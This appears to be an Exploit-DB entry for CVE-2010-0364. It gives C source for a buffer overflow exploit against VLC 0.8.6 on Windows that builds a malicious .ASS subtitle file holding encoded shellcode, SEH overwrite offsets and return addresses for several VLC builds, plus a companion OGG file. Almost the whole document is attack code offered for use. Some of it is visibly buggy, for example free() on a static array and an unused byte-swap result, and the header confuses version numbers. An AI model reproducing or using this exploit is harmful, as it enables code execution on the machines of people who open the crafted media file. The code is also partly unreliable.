VLC 0.8.6 [b][c][d][a] - (.ASS file) buffer overflow exploit(win32 universal)



EDB-ID: 11174 CVE: 2010-0364 OSVDB-ID: 61895
Author: fl0 fl0w Published: 2010-01-17 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
/*[%]VLC vs 0.6.8 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)
  [%]Works every time,works on any win32 OS,tested on Windows xp sp2.
  
  [%]My doctor said that I have seriuouse problems ,but I think he's full of it
     because the voices tell me I'm ok!*/
#include<stdio.h>
#include<string.h>
#include<stdint.h>

#define File            "subtitle666.ass"
#define OGGfile         "openme.ogg"
#define IF(x,NULL)      if(x==NULL)
#define FOR(i,a,b)      for(i=a;i<b;++i)
#define WHILE(z)        while(z>0)
#define is_bigendian()  ((*(char*)&i)==0)
#define EIP_OFFSET      163852
#define SEH_OFFSET      165248
#define NEXTSEH_OFFSET  165244   
/*-------------prototypes---------*/
   //100% working shellcode
   char vlcshellcode[]=
   {
        "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d"
        "\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c"
        "\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90"
        "\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4"
        "\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf"
        "\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd"
        "\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52"
        "\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1"
        "\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b"
        "\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9"
   };      
   char data[]= 
   { 
        "[Script Info]\n"
        "; Script generated by Aegisub\n"
        "; http://www.aegisub.net\n"
        "Title: Neon Genesis Evangelion - Episode 26 (neutral Spanish)\n"
        "Original Script: RoRo\n"
        "Script Updated By: version 2.8.01\n"
        "ScriptType: v4.00+\n"
        "Collisions: Normal\n"
        "PlayResY: 600\n"
        "PlayDepth: 0\n"
        "Timer: 100,0000\n"
        "Video Aspect Ratio: 0\n"
        "Video Zoom: 6\n"
        "Video Position: 0\n"
        "[V4+ Styles]\n"
        "Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding\n"
        "Style: DefaultVCD, Arial,28,&H00B4FCFC,&H00B4FCFC,&H00000008,&H80000008,-1,0,0,0,100,100,0.00,0.00,1,1.00,2.00,2,30,30,30,0\n"
        "[Events]\n"
        "Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text\n"
        "Dialogue:"  
        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" //165254 junk bytes to cause exception
   };         
   char banner[]=
   {
        "******************************************************************\n"
        "       VLC 0.6.8x Buffer overflow exploit(win32 universal)      *\n"   
        "                                                                 *\n"       
        "                          by fl0 fl0w                            *\n"
        "******************************************************************\n"
   };  
   char arguments[]=
   { 
        "---------------------------\n"
        "Too few args!              \n" 
        "sploit.exe [target 1/2/3/4]\n"
        "---------------------------\n"
   };
   
    // data + 165254 nop + shellcode + szJMP(strcat)
  /*--------extern variables----------*/
     char b[1000000];
     char c[1000000];
     char d[1000000];
     char f[1000000]; //1402 bytes nop
     char seh[]="\x87\x75\x40\x4B";  
     char nseh[]="\x38\xFA\x74\x02";
     int i;
     int input;
     char bf[4];
     int t;
     
 /*-------prototypes----------*/
     int buildF();
     int cpy(unsigned int,char*);
     void print(char*);
     void gen_random(char*, const int);
     unsigned int getFsize(FILE*,char*);
     int cpystr(char* dest,int,int);
     int oggf(char* fname);
     int Targetprint();
     
 /*--------ogg file format---------*/    
    typedef struct aa
    {  //28 bytes or 224 bits
     uint32_t   Cp;    // Capture pattern &#65533; 32 bits           
     uint8_t    Ver;    // Version &#65533; 8 bits
     uint8_t    H;    // Header type &#65533; 8 bits
     uint64_t   Gp;   //  Granule position &#65533; 64 bits
     uint32_t   Bsn;  //   Bitstream serial number &#65533; 32 bits
     uint32_t   Psn;  //   Page sequence number &#65533; 32 bits
     uint32_t   C;    // Checksum &#65533; 32 bits
     uint8_t    Ps;    // Page segments &#65533; 8 bits
     uint8_t    St;    // Segment table 8 bit
    }ogg;
/*------targets------------*/
     struct 
     {
          unsigned int eip;
          char* etype;  
     }RET[]=
     {
     {
         0x026DFA38,
         "VLC 0.8.6       c"
     }, 
     {
         0x0263FA38,
         "VLC 0.8.6     b,d"
     }, 
     {
         0x0267FA38,
         "VLC 0.8.6       a"
     }, 
     {
         0x0267FA38,
         "VLC 0.8.6 b test1"
     }, 
     {
         0x02B6FA38,
         "VLC 0.8.6     RC1"
     }, 
     {
         NULL,NULL
     }
     };              
/*------main--------*/
    int main(int argc,char* argv[])
    {
          if(argc<2) 
          {
           system("CLS");
           
           printf("%s%s",banner,arguments); 
           
           Targetprint();exit(0);
           }
           
            input=atoi(argv[1]);           
          
            switch(input)
            {
                   case 0:
                   reverseInt(RET[0].eip);     
                   cpy(RET[0].eip,bf);       
                   break;
                   
                   case 1:
                   reverseInt(RET[1].eip);     
                   cpy(RET[1].eip,bf);
                   break;
                                 
                   case 2:
                   reverseInt(RET[2].eip);     
                   cpy(RET[2].eip,bf);
                   break;
                                        
                   case 3:
                   reverseInt(RET[3].eip);     
                   cpy(RET[3].eip,bf);
                   break;
                                               
                   case 4:
                   reverseInt(RET[4].eip);     
                   cpy(RET[4].eip,bf);
                   break;
            }
                   printf("[!]Using : %s retaddress\n",RET[input].etype);
                   buildF(b);     oggf(OGGfile);     getchar();
         
        return 0;
    }  
    int buildF(unsigned int retn)
    {
        FILE *f=fopen(File,"wb");   
   
        IF(f,NULL)
        {
         print("File .ass error!"); exit(0);}  
         gen_random(b,165267); /*EIP offset 165267 bytes [EIP][NOP nopoffset=164667 bytes][SHELLCODE nopoffset+nrbytes nop]*/
         memcpy(b+EIP_OFFSET,bf,4);
         memset(b+EIP_OFFSET+4,0x90,10);
         memcpy(b+EIP_OFFSET+4+10,vlcshellcode,strlen(vlcshellcode)); 
         
         fprintf(f,"%s%s",data,b);    
          
         free(data); fclose(f);
           
         printf("[#]ASS file DONE!\n",getFsize(f,File));
           
         return 0;
    }      
    int oggf(char* fname)
    {
       FILE* g=fopen(fname,"wb");
          IF(g,NULL)
          {
                print("File ogg error");
                exit(0);     
          }
                ogg *W666;
                W666=(ogg*)malloc(sizeof(ogg)); 
                W666->Cp=0x5367674F;
                W666->Ver=0x00;          
                W666->H=0x02;
                W666->Gp=0x00000000;                 
                W666->Bsn=0x000060B8;
                W666->Psn=0x00000000;
                W666->C=0xA403D2F8;
                W666->Ps=0x01;
                W666->St=0x1E;
         
                fwrite(W666,sizeof(W666),9,g);                                               
           
                fclose(g);    
           
                printf("[#]OGG file DONE!\n",getFsize(g,OGGfile));  
                                    
                return 0;            
    }   
    int cpy(unsigned int source,char* dest)
    {
        int len;
        len=4;
        memcpy(dest,&source,len+1);
        return len;
    }     
    void print(char* msg)
    { 
       printf("[*]%s\n",msg); 
    }    
  
    void gen_random(char *s, const int len) 
    {
      static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    
      FOR(i,0,len)
      {
        s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
      }
       s[len]=0;
      }
    unsigned int getFsize(FILE* g,char* gname)
    {
             unsigned int s;
            
             g=fopen(gname,"rb");
             
             IF(g,NULL)
             {
             print("File error at reading");
             exit(0);
             }            
             fseek(g,0,SEEK_END);
             s=ftell(g);
             
             return s;
    }
    int reverseInt(unsigned int i)
    {
             unsigned char c1, c2, c3, c4;
     
             if(is_bigendian())
    {
             return i;
    }else
    {
             c1=i&255;
             c2=(i>>8)&255;
             c3=(i>>16)&255;
             c4=(i>>24)&255;
             return((int)c1<<24)+((int)c2<<16)+((int)c3<<8)+c4;
    }
    }
    int cpystr(char* dest,int str,int len)
    {
      memset(dest,str,len+1);
      return len; 
    }
    int Targetprint()
    {
        print("Targets are:");
        for(t=0;t<5;t++) 
        printf("[!]%s - [0x%d] - %d\n",RET[t].etype,RET[t].eip,t);
    }